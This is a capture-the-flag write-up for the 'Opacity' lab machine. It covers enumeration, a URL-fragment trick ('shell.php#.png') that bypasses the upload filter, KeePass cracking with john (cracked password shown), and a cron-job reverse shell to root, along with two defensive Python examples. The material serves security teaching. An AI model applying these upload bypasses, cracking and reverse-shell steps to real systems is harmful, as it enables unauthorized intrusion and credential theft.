Opacity

File upload Bypass - KeePass Cracking - CronJob PrivEsc

Port Scanning

Starting off with the nmap scan

22/tcp  open  ssh         syn-ack OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 0fee2910d98e8c53e64de3670c6ebee3 (RSA)
|   256 9542cdfc712799392d0049ad1be4cf0e (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBAqe7rEbmvlsedJwYaZCIdligUJewXWs8mOjEKjVrrY/28XqW/RMZ12+4wJRL3mTaVJ/ftI6Tu9uMbgHs21itQQ=
|   256 edfe9c94ca9c086ff25ca6cf4d3c8e5b (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAINQSFcnxA8EchrkX6O0RPMOjIUZyyyQT9fM4z4DdCZyA
80/tcp  open  http        syn-ack Apache httpd 2.4.41 ((Ubuntu))
| http-title: Login
|_Requested resource was login.php
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
|_http-server-header: Apache/2.4.41 (Ubuntu)
139/tcp open  netbios-ssn syn-ack Samba smbd 4.6.2
445/tcp open  netbios-ssn syn-ack Samba smbd 4.6.2
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: -1s
| nbstat: NetBIOS name: OPACITY, NetBIOS user: <unknown>, NetBIOS MAC: 000000000000 (Xerox)
| Names:
|   OPACITY<00>          Flags: <unique><active>
|   OPACITY<03>          Flags: <unique><active>
|   OPACITY<20>          Flags: <unique><active>
|   \x01\x02__MSBROWSE__\x02<01>  Flags: <group><active>
|   WORKGROUP<00>        Flags: <group><active>
|   WORKGROUP<1d>        Flags: <unique><active>
|   WORKGROUP<1e>        Flags: <group><active>
| Statistics:
|   0000000000000000000000000000000000
|   0000000000000000000000000000000000
|_  0000000000000000000000000000
| smb2-time: 
|   date: 2023-06-06T07:00:33
|_  start_date: N/A
| smb2-security-mode: 
|   311: 
|_    Message signing enabled but not required
| p2p-conficker: 
|   Checking for Conficker.C or higher...
|   Check 1 (port 29246/tcp): CLEAN (Couldn't connect)
|   Check 2 (port 6171/tcp): CLEAN (Couldn't connect)
|   Check 3 (port 20231/udp): CLEAN (Failed to receive data)
|   Check 4 (port 32869/udp): CLEAN (Failed to receive data)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked

Let's make some mental notes :)

  • SSH (OpenSSH 8.2p1) does not look vulnerable, so it is unlikely to be the way in

  • The SMB ports are interesting

  • HTTP enumeration is required; that is most likely where the initial foothold will come from

SMB Enumeration

$ smbclient -L \\\\10.10.157.10\\                                                             20.2s _ Tuesday 06 June 2023 12:33:16 PM
Password for [WORKGROUP\cash]:

        Sharename       Type      Comment
        ---------       ----      -------
        print$          Disk      Printer Drivers
        IPC$            IPC       IPC Service (opacity server (Samba, Ubuntu))
Reconnecting with SMB1 for workgroup listing.
smbXcli_negprot_smb1_done: No compatible protocol selected by server.
protocol negotiation failed: NT_STATUS_INVALID_NETWORK_RESPONSE
Unable to connect with SMB1 -- no workgroup available
$ crackmapexec smb 10.10.157.10 -u 'anonymous' -p 'anonymous' --shares                       4160ms _ Tuesday 06 June 2023 12:33:36 PM
SMB         10.10.157.10    445    OPACITY          [*] Windows 6.1 Build 0 (name:OPACITY) (domain:) (signing:False) (SMBv1:False)
SMB         10.10.157.10    445    OPACITY          [+] \anonymous:anonymous 
SMB         10.10.157.10    445    OPACITY          [+] Enumerated shares
SMB         10.10.157.10    445    OPACITY          Share           Permissions     Remark
SMB         10.10.157.10    445    OPACITY          -----           -----------     ------
SMB         10.10.157.10    445    OPACITY          print$                          Printer Drivers
SMB         10.10.157.10    445    OPACITY          IPC$                            IPC Service (opacity server (Samba, Ubuntu))
$ impacket-lookupsid 'opacity.thm/anonymous@10.10.157.10' -no-pass | tee users.txt             9.8s _ Tuesday 06 June 2023 12:36:31 PM
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

[*] Brute forcing SIDs at 10.10.157.10
[*] StringBinding ncacn_np:10.10.157.10[\pipe\lsarpc]
[-] nca_s_op_rng_error
$ smbmap -H 10.10.157.10                                                                     4032ms _ Tuesday 06 June 2023 12:37:38 PM
[+] IP: 10.10.157.10:445        Name: opacity.thm                                       
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        print$                                                  NO ACCESS       Printer Drivers
        IPC$                                                    NO ACCESS       IPC Service (opacity server (Samba, Ubuntu))

Therefore, SMB is of no use to us! Anonymous access only lists print$ and IPC$, both with NO ACCESS, and the SID brute force fails.

HTTP Enumeration

On visiting the webpage, we are redirected to the login page, login.php.

Let's look for some hidden directories:

[12:39:41] 403 -  276B  - /.ht_wsr.txt
[12:39:41] 403 -  276B  - /.htaccess.bak1
[12:39:41] 403 -  276B  - /.htaccess.orig
[12:39:41] 403 -  276B  - /.htaccess.sample
[12:39:41] 403 -  276B  - /.htaccess.save
[12:41:04] 301 -  310B  - /cloud  ->  http://opacity.thm/cloud/
[12:41:04] 200 -  639B  - /cloud/
[12:41:13] 301 -  308B  - /css  ->  http://opacity.thm/css/
[12:41:54] 200 -  848B  - /login.php
[12:42:38] 403 -  276B  - /server-status
[12:42:38] 403 -  276B  - /server-status/

The /cloud directory looks interesting. Visiting that endpoint shows a file-upload page, which takes a URL as input and fetches the image from it.

  • We can quickly set up a Python HTTP server hosting a JPEG file to learn how the application behaves - the fetch succeeds and returns 200 OK

  • If we try the same with a .php file, it is rejected :(

So the backend is validating the extension of the supplied URL. A URL fragment (everything after #) is never sent to the server when the file is fetched, so renaming shell.php to shell.php#.png passes the extension check while the application actually retrieves shell.php.
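To see why the trick above works and what a correct check looks like, here is an added example in Python (not code from the Opacity application, whose server-side source is not shown in this write-up). It contrasts a naive check that inspects the raw URL string with one that decides on the path an HTTP client will actually request, then verifies the fetched bytes against image signatures. The function names and the 198.51.100.10 address used in the usage section are constructed for the example.

```python
"""Why 'shell.php#.png' slips past a naive extension check, and a check that it does not slip past.

Added example, not code from the Opacity machine. The weak check models the
behaviour described in the write-up; function names are my own.
"""
import posixpath
from urllib.parse import urlsplit

ALLOWED_EXT = {".png", ".jpg", ".jpeg", ".gif"}

# File signatures (magic bytes) for the allowed image types.
MAGIC = {
    ".png": b"\x89PNG\r\n\x1a\n",
    ".jpg": b"\xff\xd8\xff",
    ".jpeg": b"\xff\xd8\xff",
    ".gif": b"GIF8",
}


def naive_allowed(url: str) -> bool:
    """The weak check: looks only at the end of the raw user-supplied string.
    Anything after '#' or '?' is part of that string but not of the request path."""
    return any(url.lower().endswith(ext) for ext in ALLOWED_EXT)


def fetched_path(url: str) -> str:
    """What an HTTP client really requests: the fragment is dropped client-side."""
    return urlsplit(url).path


def strict_allowed(url: str) -> bool:
    """Hardened check: decide on the path component the client will request,
    with fragment and query string already stripped by the URL parser."""
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https"):
        return False
    ext = posixpath.splitext(parts.path)[1].lower()
    return ext in ALLOWED_EXT


def content_matches(ext: str, data: bytes) -> bool:
    """Second line of defence: the fetched bytes must carry the signature
    of the type the extension claims."""
    sig = MAGIC.get(ext.lower())
    return sig is not None and data.startswith(sig)


def validate_upload(url: str, data: bytes) -> bool:
    """Accept only if the real request path has an allowed extension AND the
    downloaded content looks like that image type."""
    if not strict_allowed(url):
        return False
    ext = posixpath.splitext(urlsplit(url).path)[1].lower()
    return content_matches(ext, data)


if __name__ == "__main__":
    # Constructed attacker-style URL; 198.51.100.10 is a documentation address.
    url = "http://198.51.100.10/shell.php#.png"
    print("naive check passes:", naive_allowed(url))      # True
    print("client requests:", fetched_path(url))           # /shell.php
    print("strict check passes:", strict_allowed(url))     # False
```

The two checks disagree precisely on the input the write-up used: `naive_allowed` sees the trailing `.png`, while `strict_allowed` sees that the request path ends in `.php`. Checking the signature of the downloaded bytes closes the remaining gap where a path does end in an image extension but the server returns something else.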

Looking around the web root as www-data, we find some creds in the login.php source code.

Let's log in to the website with the credentials we got. We can also try spraying them against the local users sysadmin and root, but nothing worked ;(

Lateral Move => Sysadmin

Since we had reached a dead end, I started looking around and found dataset.kdbx in the /opt folder. I transferred it to our machine and analyzed it with the file command.

  • It is a KeePass database file; we can try to crack its master password with john

$ keepass2john dataset.kdbx > keepasshash.txt
$ john keepasshash.txt --wordlist=/opt/rockyou.txt
Using default input encoding: UTF-8                                                                                                              
Loaded 1 password hash (KeePass [SHA256 AES 32/64])                                                                                              
Cost 1 (iteration count) is 100000 for all loaded hashes                                                                                         
Cost 2 (version) is 2 for all loaded hashes                                                                                                      
Cost 3 (algorithm [0=AES 1=TwoFish 2=ChaCha]) is 0 for all loaded hashes                                                                         
Will run 4 OpenMP threads                                                                                                                        
Press 'q' or Ctrl-C to abort, almost any other key for status                                                                                    
741852963        (dataset)                                                                                                                       
1g 0:00:00:09 DONE (2023-06-06 13:26) 0.1015g/s 89.34p/s 89.34c/s 89.34C/s chichi..david1                                                        
Use the "--show" option to display all of the cracked passwords reliably                                                                         
Session completed.

With the cracked master password, we can open the database in the KeePass2 GUI and read the stored credentials.

We can now SSH into the box as sysadmin :)

Privilege Escalation => Root

Now that we have a stable shell as sysadmin, we can read local.txt.

Let's start enumerating from here; the scripts directory looks interesting!

sysadmin@opacity:~$ cd scripts/                                                                                                                  
sysadmin@opacity:~/scripts$ ls                                                                                                                   
lib  script.php                                                                                                                                  
sysadmin@opacity:~/scripts$ 
sysadmin@opacity:~/scripts$ cat script.php 
<?php

//Backup of scripts sysadmin folder
require_once('lib/backup.inc.php');
zipData('/home/sysadmin/scripts', '/var/backups/backup.zip');
echo 'Successful', PHP_EOL;

//Files scheduled removal
$dir = "/var/www/html/cloud/images"; 
if(file_exists($dir)){
    $di = new RecursiveDirectoryIterator($dir, FilesystemIterator::SKIP_DOTS);
    $ri = new RecursiveIteratorIterator($di, RecursiveIteratorIterator::CHILD_FIRST);
    foreach ( $ri as $file ) {
        $file->isDir() ?  rmdir($file) : unlink($file);
    }
}
?>

So script.php requires another file, backup.inc.php, which lives in the lib directory:

sysadmin@opacity:~/scripts/lib$ ls -lahs
total 132K
4.0K drwxr-xr-x 2 sysadmin root 4.0K Jul 26  2022 .
4.0K drwxr-xr-x 3 root     root 4.0K Jul  8  2022 ..
 12K -rw-r--r-- 1 root     root 9.3K Jul 26  2022 application.php
4.0K -rw-r--r-- 1 root     root  967 Jul  6  2022 backup.inc.php
 24K -rw-r--r-- 1 root     root  24K Jul 26  2022 bio2rdfapi.php
 12K -rw-r--r-- 1 root     root  11K Jul 26  2022 biopax2bio2rdf.php
8.0K -rw-r--r-- 1 root     root 7.5K Jul 26  2022 dataresource.php
8.0K -rw-r--r-- 1 root     root 4.8K Jul 26  2022 dataset.php
4.0K -rw-r--r-- 1 root     root 3.2K Jul 26  2022 fileapi.php
4.0K -rw-r--r-- 1 root     root 1.3K Jul 26  2022 owlapi.php
4.0K -rw-r--r-- 1 root     root 1.5K Jul 26  2022 phplib.php
 12K -rw-r--r-- 1 root     root  11K Jul 26  2022 rdfapi.php
 20K -rw-r--r-- 1 root     root  17K Jul 26  2022 registry.php
8.0K -rw-r--r-- 1 root     root 6.8K Jul 26  2022 utils.php
4.0K -rwxr-xr-x 1 root     root 3.9K Jul 26  2022 xmlapi.php

All the files here are owned by root, but the lib directory itself is owned by sysadmin (drwxr-xr-x sysadmin root). Let's copy backup.inc.php out to our home directory so that we can edit it:

sysadmin@opacity:~/scripts/lib$ cp backup.inc.php ../                                                                                            
cp: cannot create regular file '../backup.inc.php': Permission denied                                                                            
sysadmin@opacity:~/scripts/lib$ cp backup.inc.php ../../                                                                                         
sysadmin@opacity:~/scripts/lib$ cd ..                                                                                                            
sysadmin@opacity:~/scripts$ ls                                                                                                                   
lib  script.php                                                                                                                                  
sysadmin@opacity:~/scripts$ cd ..                                                                                                                
sysadmin@opacity:~$ ls                                                                                                                           
backup.inc.php  local.txt  scripts

Because we own the lib directory, we can delete the root-owned backup.inc.php inside it (write permission on a directory allows removing its entries regardless of who owns the files). We then insert our PHP reverse shell payload into our copy, put it back where the original was, and wait for the cron job to execute script.php as root:

$ rlwrap nc -nlvp 9999                                                                                Tuesday 06 June 2023 01:39:37 PM
listening on [any] 9999 ...
connect to [10.8.74.51] from (UNKNOWN) [10.10.157.10] 43978
Linux opacity 5.4.0-139-generic #156-Ubuntu SMP Fri Jan 20 17:27:18 UTC 2023 x86_64 x86_64 x86_64 GNU/Linux
 08:10:02 up  1:12,  1 user,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
sysadmin pts/1    10.8.74.51       08:00   10.00s  0.12s  0.12s -bash
uid=0(root) gid=0(root) groups=0(root)
sh: 0: can't access tty; job control turned off
# whoami
root
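The weakness here is a root cron job loading code from a path a non-root user controls, and it is not obvious from `ls -l` alone because the included file itself is root-owned. The following Python is an added example (not from the machine or this write-up) of an audit that walks an include path and reports every component the given uid could tamper with, treating a writable parent directory as replaceable content and respecting the sticky bit. The demo tree is constructed with tempfile; since the example cannot chown files to root, mode 444 on backup.inc.php stands in for root ownership. Function names are my own.

```python
"""Audit whether a privileged script's include can be swapped by a low-privilege user.

Added example, not code from the Opacity machine: it reproduces the check a
defender would run against script.php's require_once('lib/backup.inc.php').
"""
import os
import stat
import tempfile
from pathlib import Path


def writable_by(st: os.stat_result, uid: int, gids: set) -> bool:
    """Classic Unix write-bit check for a given uid and set of gids."""
    if st.st_uid == uid:
        return bool(st.st_mode & stat.S_IWUSR)
    if st.st_gid in gids:
        return bool(st.st_mode & stat.S_IWGRP)
    return bool(st.st_mode & stat.S_IWOTH)


def audit_include(path: str, uid: int, gids: set) -> list:
    """Return (component, reason) pairs for every way `uid` could control what
    a root process loads from `path`: a writable file, or a writable directory
    anywhere above it. A writable directory lets the user unlink and recreate
    entries regardless of who owns the files, which is exactly what the
    sysadmin-owned lib/ directory allowed on Opacity."""
    findings = []
    target = Path(path).resolve()  # resolve() removes symlinks from the chain
    for comp in [target] + list(target.parents):
        st = os.lstat(comp)
        if stat.S_ISDIR(st.st_mode):
            if not writable_by(st, uid, gids):
                continue
            # Sticky bit (as on /tmp): only an entry's owner or the directory
            # owner may remove/rename it, so root-owned entries are safe from
            # a non-owner there.
            if st.st_mode & stat.S_ISVTX and st.st_uid != uid:
                continue
            findings.append((str(comp), "directory writable: entries can be replaced"))
        elif writable_by(st, uid, gids):
            findings.append((str(comp), "file writable: contents can be edited"))
    return findings


def build_demo_tree() -> str:
    """Constructed replica of the Opacity layout: scripts/lib/ owned by the
    running user with mode 755, containing backup.inc.php that the user cannot
    write (mode 444 stands in for root ownership). Returns the include path."""
    base = tempfile.mkdtemp(prefix="opacity-demo-")
    lib = Path(base, "scripts", "lib")
    lib.mkdir(parents=True)
    os.chmod(lib.parent, 0o755)
    os.chmod(lib, 0o755)
    inc = lib / "backup.inc.php"
    inc.write_text("<?php function zipData($src, $dst) { /* backup logic */ } ?>\n")
    os.chmod(inc, 0o444)
    return str(inc)


def run_demo() -> dict:
    """Audit the constructed tree from two viewpoints: the directory owner
    (the sysadmin role on the box) and an unrelated uid with no access."""
    inc = build_demo_tree()
    return {
        "include": inc,
        "base": str(Path(inc).parents[2]),
        "owner": audit_include(inc, os.getuid(), set(os.getgroups())),
        "foreign": audit_include(inc, 65534, {65534}),
    }


if __name__ == "__main__":
    result = run_demo()
    print("include:", result["include"])
    for comp, reason in result["owner"]:
        print(f"[!] {comp}: {reason}")
```

Run as the directory owner, the audit flags `scripts/lib` even though `backup.inc.php` itself is not writable, which is the finding a plain permission check on the file would miss. The same tree audited for an unrelated uid yields nothing under the demo base. On a real system the fix is the one the finding implies: code loaded by a root job must live in a path where every directory, and the file, is writable by root alone.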
